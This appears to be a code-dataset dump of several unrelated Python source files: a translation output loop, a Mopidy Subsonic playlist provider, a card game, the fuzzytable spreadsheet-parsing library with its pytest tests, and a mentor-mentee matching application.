text, is_replaced = replace_quoted_params(src_tokens, tgt_tokens, tokenizer, sample_layer_attention_pooled, args.model_type, tgt_lang)
if not is_replaced and args.force_replace_qp:
text = force_replace_quoted_params(src_tokens, tgt_tokens, tokenizer, sample_layer_attention_pooled, args.model_type)
else:
text = tokenizer.convert_tokens_to_string(tgt_tokens)
else:
text = tokenizer.decode(out_cropped, clean_up_tokenization_spaces=False, skip_special_tokens=True)
text = re.sub('\s\s+', ' ', text) # remove duplicate white spaces
text = text.strip()
text = tokenize_cjk_chars(text)
if not args.skip_heuristics:
text = output_heuristics(text, batch_reverse_maps[sample_index])
batch_outputs[sample_index].append(text)
all_outputs.extend(batch_outputs)
if batch_idx == 0 and args.verbose:
logger.info('First batch output: %s', str(all_outputs))
batch_idx += 1
# sort the results back to their original order
_, all_outputs = tuple(zip(*sorted(list(zip(original_order, all_outputs)))))
if args.output_file is not None:
with open(args.output_file, 'w') as output_file:
for i, output in enumerate(all_outputs):
for j, text in enumerate(output):
# if num_samples is 1 keep the original id
if len(output) == 1:
id_ = all_example_ids[i]
else:
id_ = '{}-{}'.format(all_example_ids[i], j)
if args.output_example_ids_too:
output_file.write('\t'.join([id_, text]) + '\n')
else:
output_file.write(text + '\n')
else:
print(json.dumps(all_outputs, indent=2))
metrics = compute_metrics(all_outputs, all_golds, reduction=args.metric_reduction)
logger.info('Average BLEU score = %.2f', metrics['bleu'])
logger.info('Exact match score = %.2f', metrics['em'])
``` |
{
"source": "jonathanchristison/mopidy-subsonic",
"score": 2
} |
#### File: mopidy-subsonic/mopidy_subsonic/playlist.py
```python
import logging
from __future__ import unicode_literals
from mopidy import backend
from mopidy.models import Playlist, Ref
logger = logging.getLogger(__name__)
class SubsonicPlaylistsProvider(backend.PlaylistsProvider):
def __init__(self, *args, **kwargs):
super(SubsonicPlaylistsProvider, self).__init__(*args, **kwargs)
self.remote = self.backend.remote
self.playlists = self._get_playlists()
def lookup(self, uri):
logger.debug('Playlist lookup. uri = %s' % uri)
id = uri.split("subsonic:playlist:")[1]
try:
id = int(id)
return self.remote.playlist_id_to_playlist(id)
except:
return self.remote.get_smart_playlist(id)
def playlist_to_ref(self, playlist):
return Ref(
uri=playlist.uri,
name=playlist.name,
type=Ref.PLAYLIST
)
def track_to_ref(self, track):
return Ref(
uri=track.uri,
name=track.name,
type=Ref.TRACK
)
def as_list(self):
playlists = self._get_playlists()
return [self.playlist_to_ref(playlist) for playlist in playlists]
def get_items(self, uri):
playlist = self.lookup(uri)
return [self.track_to_ref(track) for track in playlist.tracks]
def _get_playlists(self):
smart_playlists = {'random': 'Random Albums',
'newest': 'Recently Added',
'highest': 'Top Rated',
'frequent': 'Most Played',
'recent': 'Recently Played',
'randomsongs': 'Random Songs'}
playlists = self.remote.get_user_playlists()
for type in smart_playlists.keys():
playlists.append(
Playlist(
uri=u'subsonic:playlist:%s' % type,
name='Smart Playlist: %s' % smart_playlists[type]))
return playlists
``` |
{
"source": "jonathanchu/jontourage",
"score": 2
} |
#### File: jontourage/_hooks/links.py
```python
class Link(object):
def __init__(self, name, url):
self.name = name
self.url = url
projects = [ Link('growl', 'https://github.com/xfire/growl/tree'),
Link('pydzen', 'https://github.com/xfire/pydzen/tree'),
Link('python-wmii', 'https://github.com/xfire/python-wmii/tree'),
Link('preplace', 'https://github.com/xfire/preplace/tree'),
Link('jitertools', 'https://github.com/xfire/jitertools/tree'),
Link('mailfilter', 'http://projects.spamt.net/mailfilter/'),
]
links = [ Link('github', 'http://github.com/xfire/'),
Link('dotfiles', 'https://github.com/xfire/dotfiles/tree'),
Link("copton's blog", 'http://blog.copton.net/'),
Link("copton's ethz blog", 'http://blogs.ethz.ch/copton/'),
Link("schula's blog", 'http://blog.spamt.net/'),
Link("freaky's blog", 'http://www.freakysoft.de/blog/'),
]
updates = AttrDict(projects = projects, links = links)
if not 'site' in Site.CONTEXT:
Site.CONTEXT.site = updates
else:
Site.CONTEXT.site.update(updates)
``` |
{
"source": "jonathanchukinas/card_game",
"score": 4
} |
#### File: card_game/card_game/cards.py
```python
import collections
import random
import functools
@functools.total_ordering
class Card(collections.namedtuple('CardTuple', 'rank suit ranks suits')):
"""
Card objects represent a single playing card.
Compares to other Card objects. All arguments should be lower case.
Capitalization is handled by repr and str dunder method. ranks and
suits arguments should be sorted in ascending value.
:param rank: string - card number or face value (e.g. '9' or 'jack')
:param suit: string - card suit (e.g. 'diamonds' or 'clubs')
:param ranks: list of strings - all avail card number and face values
:param suits: list of strings - all avail card deck suits.
"""
@property
def indices(self):
"""
:return: tuple integers, representing the value of this card
"""
return self.ranks.index(self.rank), self.suits.index(self.suit)
def __lt__(self, other):
return self.indices < other.indices
def __eq__(self, other):
return self.indices == other.indices
def __repr__(self):
return f'Card({self.rank[0]}, {self.suit[0]})'
def __str__(self):
if self.rank[0] == 'p':
return 'Penalty Card!'
return f'{self.rank.title()} of {self.suit.title()}'
class CardDeck:
"""
CardDeck objects represent a deck of Card objects.
Choose shuffled or unshuffled.
"""
def __init__(self, shuffle=True):
ranks, suits = self.ranks_and_suits
self.cards = [
Card(rank, suit, ranks, suits)
for rank in ranks
for suit in suits
]
if shuffle:
random.shuffle(self) # in-place shuffle
@property
def ranks_and_suits(self):
"""
Tuples of lists: ranks and suits, each listed in ascending value.
"""
ranks = 'penalty jack queen king ace'.split()
ranks[1:1] = [str(val) for val in range(2, 11)] # insert after penalty
suits = 'clubs diamonds hearts spades'.split()
return ranks, suits
def draw_card(self):
"""
Remove and return the top card from the deck.
:return: Card object
"""
return self.cards.pop()
def __len__(self):
return len(self.cards)
def __getitem__(self, item):
return self.cards[item]
def __setitem__(self, key, value):
self.cards[key] = value
if __name__ == '__main__':
help(Card)
```
#### File: card_game/card_game/game.py
```python
import click
import operator
from card_game.cards import CardDeck
from card_game.player import Player
from card_game.print_utils import indent, print_header, print_scoreboard
class Game:
"""
This class controls the flow of the game.
Instantiates 2-4 Player objects, then executes the game, one round at
a time. Each round, a shuffled card deck is generated, and a card drawn
for each player. The Player objects check for round check_for_winner and hold
state for their current card and win/loss record. Rounds are played
until the Game object finds a game check_for_winner.
"""
def __init__(self, players, manual_draw=False, pause_at_round_end=False):
"""
:param players: either an integer (player count), or a list of
strings (of player names).
:param manual_draw: if True, game waits for user input for each
card draw.
:param pause_at_round_end: if True, game waits for user input at
the end of each round.
"""
if isinstance(players, int):
self.players = [Player(player_index) for player_index in range(players)]
self.players_have_names = False
elif isinstance(players, list):
self.players = [
Player(player_number, player_name)
for player_number, player_name in enumerate(players)
]
self.players_have_names = True
else:
raise TypeError
self._manual_draw = manual_draw
self._round_end_pause = pause_at_round_end
def play(self):
"""
Play a series of rounds until a winner emerges.
:return: None
"""
round_number = 0
winner = None
while not winner:
round_number += 1
winner = self.play_a_round(round_number)
print_header('game end')
click.secho(f'\n{winner} wins the game! Well done!!!', fg='green', bold=True)
def play_a_round(self, round_number):
"""
Play a single round.
Print round number as header. Generate shuffled deck. Call card
draw method for each player. Player objects evaluate and store
their win or loss. Print same win or loss. Print scoreboard.
:param round_number: int. Ensures the round header and scoreboard
print correctly.
:return: Player object (game winner) if game end; else None. This
is used by the play method to bring the game to an end.
"""
# --- get a shuffled deck ---------------------------------------------
deck = CardDeck()
round_header = f'round {round_number}'
print_header(round_header)
click.echo(f'\nThe deck has been shuffled. Here we go!')
# --- draw cards ------------------------------------------------------
for player in self.players:
self.draw_card(player, deck)
# --- assign points ---------------------------------------------------
cards = [player.card for player in self.players]
for player in self.players:
player.determine_round_status(cards)
# --- print round summary ---------------------------------------------
click.echo()
for player in self.players:
player.print_round_summary()
print_scoreboard(round_number, self.players, self.players_have_names)
# -- Pause after each round -------------------------------------------
winner = self.check_for_winner()
if not winner and self._round_end_pause:
click.echo()
click.pause()
return winner
def draw_card(self, player, deck):
"""
Draw a card for a single player
Depending on Game instance arguments, wait for user input. Print
player info and card drawn.
:param player: Player object
:param deck: Deck object
:return: None
"""
if self._manual_draw:
click.pause(info=f"\n{player}, press any key to draw a card...")
else:
click.echo(f'\n{player} draws...')
player.card = deck.draw_card()
click.echo(indent(player.card))
def check_for_winner(self):
"""
Check for game check_for_winner.
:return: Player object (check_for_winner) if game end; else None
"""
players = sorted(self.players, key=operator.attrgetter('score')) # players sorted by score
if players[-1].score >= 21 and players[-1].score - players[-2].score >= 2:
return players[-1]
else:
return None
if __name__ == "__main__":
help(Game)
```
#### File: card_game/card_game/player.py
```python
import collections
import functools
import click
class Player:
"""
Objects of this class represent a single game player.
Stores the player's index, name, latest card and win/loss record
through the game. Has methods for determining round winner/loser and
for calculating score for current or any round.
"""
def __init__(self, index, name=None):
"""
:param index: int - zero-indexed number
:param name: str - optional player name
"""
self.index = index
self.name = name
self.card = None
self._results = []
@property
def number(self):
"""Player's unique number for printing purposes"""
return self.index + 1
@staticmethod
def points_earned(status):
"""Return dictionary of values for winning/losing a round."""
points = {'w': 2, 'n': 0, 'p': -1}
return points[status]
@property
def str_points_earned_this_round(self):
"""
Return string - points earned in latest round.
Used by scoreboard at end of round.
String is prepended with '-' or '+'.
"""
pts = self.points_earned(self.round_status)
pts = str(pts)
if len(pts) == 1:
pts = '+' + pts
return pts # self.points_earned(self.round_status)
@property
def round_status(self):
"""Return str - single character representing the win/loss status
of latest round."""
return self._results[-1]
@functools.lru_cache()
def get_score(self, round_num):
"""Return int - cummulative score for a given round number."""
if round_num == 0:
return 0
else:
result = self._results[round_num - 1] # round_status from this round_num
points = self.points_earned(result) # points gained or lost this round_num
return max(0, self.get_score(round_num - 1) + points) # return score
@property
def score(self):
"""Return int - cummulative score as of latest round."""
round_num = len(self._results)
return self.get_score(round_num)
def determine_round_status(self, all_cards_from_this_round):
"""
Determine player's win/loss status this round
Win, penalty, or neutral
"""
if self.card.rank[0] == 'p':
self._results.append('p') # penalty
elif self.card == sorted(all_cards_from_this_round)[-1]:
self._results.append('w') # check_for_winner
else:
self._results.append('n') # n/a
def print_round_summary(self):
"""Print player's win/neutral/penalty status this round"""
RoundSummary = collections.namedtuple("RoundSummary", 'txt color bold')
round_summaries = {
'w': RoundSummary(f'{self} wins the round!', 'green', True),
'n': RoundSummary(f'{self} gains no points', None, False),
'p': RoundSummary(f'{self} is penalized!', 'red', True),
}
rs = round_summaries[self.round_status]
click.secho(rs.txt, fg=rs.color, bold=rs.bold)
def __repr__(self):
if self.name is None:
return f"Player {self.number}"
return f"Player {self.number} ({self.name})"
``` |
{
"source": "jonathanchukinas/fuzzytable",
"score": 4
} |
#### File: fuzzytable/datamodel/fields.py
```python
from typing import Optional, List, Iterable
from abc import ABC, abstractmethod
# --- Intra-Package Imports ---------------------------------------------------
from fuzzytable.main.utils import get_repr
# --- Third Party Imports -----------------------------------------------------
# None
class Field(ABC):
"""
Shared attributes/methods:
header
col_num
name
matched
data
ratio
__getitem__
__len__
"""
pass
class SingleField(Field):
"""
Represents a single column of your table.
A single FuzzyTable object will have several SingleField objects, stored as a list in ``FuzzyTable.field_names``.
SingleField objects are the source of truth for table contents.
Remove a field from ``FuzzyTable.field_names`` and it disappears from the ``FuzzyTable`` and ``FuzzyTable.records`` views as well.
>>> import fuzzytable
>>> ft = fuzzytable.FuzzyTable('birthdays.csv')
>>> first_name = ft.field_names[0]
>>> first_name.col_num
1
>>> first_name.data
['John', 'Typhoid', 'Jane']
>>> str(first_name)
"<SingleField 'first_name' 0x10dcce8>"
Attributes:
name: return ``str``, the unique identifier for this field. Matches the field name you passed to FuzzyTable. Otherwise, return ``header``.
data: return list of cell values.
header: return ``str``, the value from the header cell. This may differ from ``name`` if fuzzy matching was specified.
col_num: return ``int``, column number, 1-indexed. For example, a field extracted from column B has a col_num of 2.
matched: return ``bool``. True if this field matches a field name passed to the FuzzyTable constructor.
"""
def __init__(
self,
header: str,
col_num: int,
) -> None:
super().__init__()
# populated during init
self.header = header
self.col_num = col_num
# populated during match with FieldPattern
self._name = None
self.matched = False
self.data = None
self.ratio = None
self.cellpattern = None
# populated during later step after all matching is done
@property
def name(self):
if self._name is None:
return self.header
else:
return self._name
@name.setter
def name(self, value):
self._name = value
def __repr__(self):
return get_repr(self) # pragma: no cover
def __getitem__(self, item):
return self.data[item]
def __len__(self):
return len(self.data)
class MultiField(Field):
"""
Represents one or more columns of your table.
"""
def __init__(self, name, fields: List[SingleField]) -> None:
super().__init__()
self.name = name
self.subfields = list(sorted(fields, key=lambda f: f.col_num))
# self._len = len(subfields)
# self._header_row = header_row
# self._row_count = row_count
self.matched = True
self.cellpattern = None
@property
def header(self):
return tuple(field.header for field in self.subfields)
@property
def data(self):
return [
self[i]
for i in range(len(self))
]
@property
def ratio(self):
# return minimum ratio of all subfields
return min(field.ratio for field in self.subfields)
def __len__(self):
return len(self.subfields[0])
def __getitem__(self, item):
return tuple(
field.data[item]
for field in self.subfields
)
@property
def col_nums(self):
return [field.col_num for field in self.subfields]
@property
def col_num(self):
return self.col_nums[0]
@property
def col_num_last(self):
return self.col_nums[-1]
class RowField(SingleField):
def __init__(self, header_row_num, sheet_row_count):
super().__init__(
header='row',
col_num=-1,
)
self.data = range(header_row_num + 1, sheet_row_count + 1)
if __name__ == '__main__':
pass
```
#### File: fuzzytable/datamodel/sheet.py
```python
class Sheet:
"""
Container for sheet metadata, e.g. path, header row number, number of rows, etc
>>> import fuzzytable
>>> ft = fuzzytable.FuzzyTable('birthdays.csv')
>>> ft.sheet.header_row_num
1
>>> ft.sheet.header_ratio
0.0
>>> ft.sheet.row_count
4
>>> ft.sheet.path
WindowsPath('birthdays.csv')
>>> ft.sheet.sheetname
None
Attributes:
header_row_num: ``int`` row number, 1-indexed.
header_ratio: ``float`` percent match between desired field names and the found headers. ``0.0`` if no field names were specified.
row_count: ``int`` total number of rows in the worksheet.
path: ``pathlib.Path`` object. ``str(path)`` to convert to string.
sheetname: ``str`` name of worksheet if excel.
"""
def __init__(self, header_row_num, row_count, ratio, path, sheetname):
self.header_row_num = header_row_num
self.header_ratio = ratio
self.row_count = row_count
self.path = path
self.sheetname = sheetname
# def __repr__(self):
# return get_repr(self) # pragma: no cover
```
#### File: tests/experiments/gen.py
```python
def numgen(last_num):
num = 1
going = True
while going:
yield num
num += 1
if num > last_num:
going = False
for num in numgen(3):
print(num)
def numgen2(last_num):
num = 1
while True:
yield num
num += 1
if num > last_num:
return
for num in numgen2(3):
print(num)
```
#### File: tests/experiments/graveyard.py
```python
class Something:
def __init__(self, stuff):
self.hello = stuff
allthings = [Something(i) for i in range(5)]
many = lambda x: x.hello >= 3
manythings = filter(many, allthings)
for thing in manythings:
print(thing.hello)
```
#### File: fuzzytable/tests/test_4_data_model.py
```python
import pytest
from tests.conftest import get_dr_who_records
@pytest.mark.simple
# 1 #####
def test4_1_second_record_equality(ft_dr_who_all_fields, dr_who_records):
# GIVEN a sheet containing the following record...
expected_second_record = dr_who_records[1]
# WHEN user successfully extracts all field_names from the sheet...
ft = ft_dr_who_all_fields
ft.records.include_row_num = False
actual_second_record = ft.records[1]
# THEN ft.records and the expected dictionary compare equal.
assert actual_second_record == expected_second_record
@pytest.mark.parametrize("records_equal", [
(get_dr_who_records(), True),
(get_dr_who_records()[0:1], False),
(list(range(3)), False),
])
@pytest.mark.parametrize("convert_to_dict_list", [
True,
False
])
# 2 #####
def test4_2_records_equality(ft_dr_who_all_fields, records_equal, convert_to_dict_list):
# GIVEN a sheet containing the following table...
expected_records, compare_equal = records_equal
# WHEN user successfully extracts all field_names from the sheet...
ft = ft_dr_who_all_fields
ft.records.include_row_num = False
# ft.records.include_row_num = False
actual_records = ft.records
if convert_to_dict_list:
actual_records = [
dict(record)
for record in actual_records
]
# THEN ft.records and the expected dictionary compare equal.
if compare_equal:
assert actual_records == expected_records
else:
assert actual_records != expected_records
# 3 #####
def test4_3_fields_dict_equality(ft_dr_who_all_fields, dr_who_fields):
# GIVEN a sheet containing the following table...
expected_dict = dr_who_fields
ft = ft_dr_who_all_fields
ft.records.include_row_num = False
# WHEN user casts fuzzy table to dict...
actual_dict = dict(ft)
# THEN ft.records and the expected dictionary compare equal.
assert actual_dict == expected_dict
# assert list(ft.items()) == dr_who_fields.items()
# OTHER
for field in ft.fields:
str(field)
print(ft.records.include_row_num)
# 4 #####
def test4_4_records_rows(ft_dr_who_all_fields, dr_who_fields):
# GIVEN a table with headers in row 4...
expected_rows = list(range(5, 8))
# WHEN user accesses records via get_records:
ft = ft_dr_who_all_fields
actual_rows = [
record['row']
for record in ft.records
]
# THEN the records have the correct row numbers
assert actual_rows == expected_rows
# 5 #####
def test4_5_records_missing_field(ft_dr_who_some_fields, dr_who_records):
# GIVEN a sheet containing the following table...
expected_records = dr_who_records
# WHEN user extracts only some field_names...
ft = ft_dr_who_some_fields
actual_records = ft.records
# THEN ft.records and the expected dictionary compare equal.
assert actual_records != expected_records
assert actual_records != [{'a': 1, 'b': 2}]*3
# 6 #####
def test4_6_fuzzytable_keysvaluesitems(ft_dr_who_all_fields, dr_who_fields):
# GIVEN a table...
expected_fields = dr_who_fields
# WHEN user extracts the table with fuzzy table...
# expected_rows = list(range(5, 8))
ft = ft_dr_who_all_fields
# THEN the fuzzy table behaves list a dictionary
assert list(ft.keys()) == list(expected_fields.keys())
assert list(ft.values()) == list(expected_fields.values())
for (ft_keys, ft_values), (exp_keys, exp_values) in zip(ft.items(), expected_fields.items()):
assert ft_keys == exp_keys
assert ft_values == exp_values
# 7 #####
def test4_7_fuzzyrecords_len(ft_dr_who_all_fields, dr_who_records):
# GIVEN a table...
expected_records = dr_who_records
expected_record_count = len(expected_records)
# WHEN user inspects records length
ft = ft_dr_who_all_fields
actual_record_count = len(ft.records)
# THEN the fuzzy table behaves list a dictionary
assert actual_record_count == expected_record_count
```
#### File: fuzzytable/tests/test_6_patterns.py
```python
from fuzzytable.patterns import FieldPattern
### 1 ###
def test_fieldpattern_repr():
field_pattern = FieldPattern('the name')
representation = repr(field_pattern)
print(representation)
```
#### File: fuzzytable/tests/test_v012_cellpatterns.py
```python
import pytest
from tests import v012_params as p
from fuzzytable import FuzzyTable, FieldPattern, exceptions, cellpatterns
@pytest.mark.parametrize('fields,expected_values,csv_or_excel', [
pytest.param(p.def_fields, p.def_csv_expected_values, '.csv', id='default cellpatterns'),
pytest.param(p.def_fields, p.def_excel_expected_values, '.xlsx', id='default cellpatterns'),
pytest.param(p.int_fields, p.int_expected_values, '', id='integer'),
pytest.param(p.str_fields, p.str_expected_values, '', id='string'),
pytest.param(p.str_field_instantiated, p.str_expected_values, '.csv', id='string (instantiated)'),
pytest.param(p.intlist_fields, p.intlist_expected_values, '', id='integerlist'),
pytest.param(p.float_fields, p.float_expected_values, '', id='float'),
pytest.param(p.wordlist_fields, p.wordlist_expected_values, '', id='wordlist'),
pytest.param(p.bool_fields, p.bool_expected_values, '', id='boolean'),
pytest.param(p.digit_fields, p.digit_expected_values, '', id='digit'),
pytest.param(p.stringchoice_fields, p.stringchoice_expected_values, '', id='choice'),
pytest.param(p.stringchoice_dict_fields, p.stringchoice_dict_expected_values, '', id='choice/dict'),
pytest.param(p.stringchoice_dict_usekeys_fields, p.stringchoice_dict_expected_values, '', id='choice/dict/keys'),
pytest.param(p.stringchoice_approx_fields, p.stringchoice_approx_expected_values, '', id='choice/approx'),
pytest.param(p.stringchoice_exact_fields, p.stringchoice_exact_expected_values, '', id='choice/exact'),
pytest.param(p.stringchoicemulti_fields, p.stringchoicemulti_expected_values, '', id='stringchoicemulti'),
pytest.param(p.customwordlist_fields, p.customwordlist_expected_values, '', id='customwordlist'),
])
@pytest.mark.parametrize('filename,kwargs', [
pytest.param('test.xlsx', {'sheetname': 'data_pattern'}, id='excel'),
pytest.param('data_pattern.csv', {}, id='csv'),
])
# 012/1 #####
def test_12_1_cellpatterns(test_files_dir, fields, expected_values, filename, kwargs, csv_or_excel):
# evaluate csv- or excel-only tests:
if csv_or_excel not in filename:
pytest.skip(f"This is a {csv_or_excel}-only test")
path = test_files_dir / filename
ft = FuzzyTable(
path=path,
fields=fields,
**kwargs,
)
actual_values = ft['values']
# for value in values:
# if not isinstance(value, str):
# assert False
assert actual_values == expected_values
@pytest.mark.parametrize('fieldpattern_kwargs,exception', [
pytest.param({
'name': 'doesnotmatter',
'cellpattern': 'This is not a cellpattern'
},
exceptions.CellPatternError,
id='CellPatternError'
),
pytest.param({
'name': 'doesnotmatter',
'cellpattern': cellpatterns.StringChoice
},
exceptions.UninstantiatededCellPatternError,
id='UninstantiatededCellPatternError'
),
])
# 012/2 #####
def test_cellpatternerror(fieldpattern_kwargs, exception):
with pytest.raises(exception):
FieldPattern(**fieldpattern_kwargs)
# 012/3 #####
def test_modeerror():
with pytest.raises(exceptions.ModeError):
cellpatterns.StringChoice(
mode='thisisnotavalidoption',
contains_match=False,
choices='does not matter what I put here'.split()
)
``` |
{
"source": "jonathanchukinas/mentormatch",
"score": 3
} |
#### File: api/applicant/applicant_collection.py
```python
from __future__ import annotations
from typing import TYPE_CHECKING, Iterable
if TYPE_CHECKING:
from .applicant_factory import ApplicantFactory
from .applicant_abc import Applicant
class ApplicantCollection(Iterable):
def __init__(self, applicant_dicts, applicant_factory: ApplicantFactory):
self._applicant_dicts = applicant_dicts
self._applicant_factory = applicant_factory
self._applicants = None
self._wwid_dict = None
def assemble_applicant_objects(self) -> None:
self._applicants = [
self._applicant_factory.build_applicant(applicant_dict)
for applicant_dict in self._applicant_dicts
]
self._wwid_dict = {
applicant.wwid: applicant
for applicant in self._applicants
}
def __iter__(self):
yield from self._applicants
def get_applicants_by_wwid(self, wwids: Iterable[int]) -> Iterable[Applicant]:
return filter(None, (self._wwid_dict.get(wwid, None) for wwid in wwids))
```
#### File: api/applicant/applicant_implementation_mentor.py
```python
from __future__ import annotations
from mentormatch.api.applicant.applicant_abc import Applicant
from mentormatch.utils import ApplicantType
from typing import TYPE_CHECKING, Dict
if TYPE_CHECKING:
from mentormatch.api.sorter.sorter_abc import Sorter
class Mentor(Applicant):
applicant_type = ApplicantType.MENTOR
def __init__(self, applicant_dict: Dict, sorter: Sorter):
super().__init__(
applicant_dict=applicant_dict,
sorter=sorter,
)
self.max_pair_count = int(applicant_dict['max_mentee_count'])
```
#### File: api/sorter/sorter_aggregator.py
```python
from typing import List
from mentormatch.api.pair.pair import Pair
from .sorter_abc import Sorter
from .util import BetterPair, WeightedSorter, pairs_equal, calc_better_pair, PairAndValue, MinMax
from collections import defaultdict
class SorterAggregatorFavor(Sorter):
# Evaluate each sub-sorter until a best pair is found.
# The position of the mentee favor evaluation is dynamically determined by
# the restart count of both mentees.
def __init__(
self,
sorters: List[Sorter],
sorter_favor: Sorter,
sorter_favor_min_position: int,
):
self._sorters = sorters
self._sorter_favor = sorter_favor
self._min_favored_position = sorter_favor_min_position
def get_better_pair(self, pair1: Pair, pair2: Pair) -> BetterPair:
favor_index = self._calc_favor_position(pair1, pair2)
sorters = list(self._sorters)
sorters.insert(favor_index, self._sorter_favor)
for sorter in sorters:
better_pair = sorter.get_better_pair(pair1, pair2)
if isinstance(better_pair, Pair):
return better_pair
return pairs_equal # pragma: no cover
def _calc_favor_position(self, pair1: Pair, pair2: Pair):
mentee1 = pair1.mentee
mentee2 = pair2.mentee
restart_count = max(mentee1.restart_count, mentee2.restart_count)
max_pair_ranker_index = len(self._sorters) - 1
pair_ranker_favor_index = max_pair_ranker_index - restart_count
favor_index = max(pair_ranker_favor_index, self._min_favored_position)
return favor_index
class SorterAggregatorWeighted(Sorter):
# Evaluate all sub-sorters and determine better pair according to the
# weight assigned to each sub-sorter.
def __init__(self, weighted_sorters: List[WeightedSorter]):
self._weighted_sorters = weighted_sorters
def get_better_pair(self, pair1: Pair, pair2: Pair) -> BetterPair:
scores = defaultdict(int)
for weighted_sorter in self._weighted_sorters:
sorter = weighted_sorter.pair_ranker
weight = weighted_sorter.weight
better_pair = sorter.get_better_pair(pair1, pair2)
if isinstance(better_pair, Pair):
scores[better_pair] += weight
return calc_better_pair(
pair1=PairAndValue(pair1, scores[pair1]),
pair2=PairAndValue(pair2, scores[pair2]),
mode=MinMax.MAX,
)
```
#### File: api/sorter/sorter_context_mgr.py
```python
from mentormatch.api.pair.pair import Pair
from .util import BetterPair
from .sorter_abc import Sorter
class SorterContextMgr(Sorter):
def __init__(self, initial_sorter: Sorter, match_sorter: Sorter):
self._initial_sorter = initial_sorter
self._match_sorter = match_sorter
self._current_sorter = None
def set_initializing_sort(self):
self._current_sorter = self._initial_sorter
def set_matching_sort(self):
self._current_sorter = self._match_sorter
def get_better_pair(self, pair1: Pair, pair2: Pair) -> BetterPair:
pair_ranker: Sorter = self._current_sorter
return pair_ranker.get_better_pair(pair1, pair2)
```
#### File: api/summarize/summarize.py
```python
from __future__ import annotations
from typing import Dict, TYPE_CHECKING
from collections import defaultdict
import pandas as pd
if TYPE_CHECKING:
from mentormatch.api.applicant.applicant_collection import ApplicantCollection
class MatchingSummary:
def __init__(self, mentors: ApplicantCollection, mentees: ApplicantCollection):
self._mentors = mentors
self._mentees = mentees
self.summary_dataframes: Dict[str, pd.DataFrame] = {}
def summarize_all(self) -> None:
self.add_pairs_to_dicts()
dataframes = {
'mentor_utilization': self.get_dataframe_mentor_utilization(),
'favor': self.get_dataframe_favor(),
'pairs': self.get_dataframe_pairs(),
}
self.summary_dataframes.update(dataframes)
def get_dataframe_favor(self) -> pd.DataFrame:
return pd.crosstab(
rownames=['Favor Level'],
index=(mentee.favor for mentee in self._mentees),
colnames=['Is Paired?'],
columns=(mentee.is_paired for mentee in self._mentees),
margins=True,
margins_name='Total'
)
def get_dataframe_mentor_utilization(self) -> pd.DataFrame:
return pd.crosstab(
rownames=['Actual'],
index=(mentor.pair_count for mentor in self._mentors),
colnames=['Max'],
columns=(mentor.max_pair_count for mentor in self._mentors),
margins=True,
margins_name='Total'
)
def get_dataframe_pairs(self) -> pd.DataFrame:
dict_pairs = defaultdict(list)
for mentor in self._mentors:
for pair in mentor.yield_pairs:
mentee = pair.mentee
dict_pairs['mentor_str'].append(str(mentor))
dict_pairs['mentee_str'].append(str(mentee))
dict_pairs['type'].append(pair.pair_type.name)
df = pd.DataFrame(dict_pairs).set_index([
'mentor_str',
'mentee_str'
]).sort_index(level=[0, 1])
return df.reset_index()
def add_pairs_to_dicts(self) -> None:
for applicants_collection in [self._mentors, self._mentees]:
for applicant in applicants_collection:
pairs = list(applicant.yield_pairs)
matches = [
pair.get_applicant(applicant.applicant_type, return_other=True)
for pair in pairs
]
wwids = [match.wwid for match in matches]
match_types = [pair.pair_type.name for pair in pairs]
applicant.application_dict['match_wwids'] = wwids #if wwids else None
applicant.application_dict['match_types'] = match_types # if match_types else None
for mentee in self._mentees:
wwids = mentee.application_dict['match_wwids']
if wwids:
mentee.application_dict['match_wwids'] = int(wwids[0])
```
#### File: mentormatch/exporter/exporter_setup.py
```python
from .exporter_aggregator import ExporterAggregator
from .exporter_abc import Exporter
import mentormatch.exporter.exporter_implementation as exim
from pathlib import Path
class ExporterFactory:
def __init__(self, output_dir: Path):
self._exporter = ExporterAggregator(exporters=[
exim.ExporterTerminal(),
exim.ExporterTxt(output_dir),
exim.ExporterExcel(output_dir),
])
def get_exporter(self) -> Exporter:
return self._exporter
```
#### File: mentormatch/importer/importer_implementation_excel.py
```python
from __future__ import annotations
from fuzzytable import FuzzyTable, exceptions as fe
from .importer_implementation_excel_schema import fieldschemas, favor
from .importer_abc import Importer
from mentormatch.utils.exceptions import MentormatchError
import mentormatch.utils as utils
from typing import Dict, List, TYPE_CHECKING
class ImporterExcel(Importer):
def __init__(self, path):
self._path = path
def execute(self) -> Dict[utils.ApplicantType, List[Dict]]:
# For this to work, there needs to be one excel workbook with the following worksheets:
# mentor
# mentee
# favor
# --- get applications from excel -------------------------------------
all_applications: Dict[utils.ApplicantType, List[Dict]] = {}
for applicant_type, fieldpatterns in fieldschemas.items():
try:
applications = FuzzyTable(
path=self._path,
sheetname=applicant_type.name.lower(),
fields=fieldpatterns,
header_row=1,
name=applicant_type.name,
missingfieldserror_active=True,
)
except fe.MissingFieldError as e: # pragma: no cover
msg = str(e) + "/nMake sure your headers are in row 1."
raise MentormatchError(msg)
except fe.FuzzyTableError as e: # pragma: no cover
raise MentormatchError(str(e))
application_list = []
locs_and_genders = utils.ApplicationSchema.get_locations_and_genders()
for record in applications.records:
application = dict(record)
application.update({
val.get_preference_key(): []
for val in utils.YesNoMaybe
})
for loc_or_gender in locs_and_genders: # e.g. 'horsham'
pref_str = application.pop(loc_or_gender) # e.g. 'no'
pref_key = utils.YesNoMaybe.get_enum(pref_str).get_preference_key() # e.g. 'preference_no'
application[pref_key].append(loc_or_gender)
application_list.append(application)
all_applications[applicant_type] = application_list
# --- get "favored" status for mentees --------------------------------
try:
favored_mentees = FuzzyTable(
path=self._path,
sheetname='favor',
fields=favor,
name='favored_mentees',
approximate_match=False,
missingfieldserror_active=True,
)
except fe.FuzzyTableError as e: # pragma: no cover
raise MentormatchError(str(e))
favored_mentees = {
mentee['wwid']: mentee['favor']
for mentee in favored_mentees.records
}
for mentee in all_applications[utils.ApplicantType.MENTEE]:
wwid = mentee['wwid']
favor_val = favored_mentees.get(wwid, 0)
mentee['favor'] = favor_val
# --- return applications ---------------------------------------------
return all_applications
```
#### File: mentormatch/importer/util.py
```python
import tkinter as tk
from pathlib import Path
from tkinter import filedialog
# --- Third Party Imports -----------------------------------------------------
# None
# --- Intra-Package Imports ---------------------------------------------------
# None
def get_path(): # pragma: no cover
root = tk.Tk()
root.withdraw()
path = Path(filedialog.askopenfilename())
return path
```
#### File: mentormatch/tests/test_import.py
```python
from mentormatch.importer import ImporterFactory
def test_import(test_files_dir, home_dir):
test_file_path = test_files_dir / 'applications.xlsx'
exporter_factory = ImporterFactory
importer = exporter_factory.get_excel_importer(
source_path=test_file_path,
)
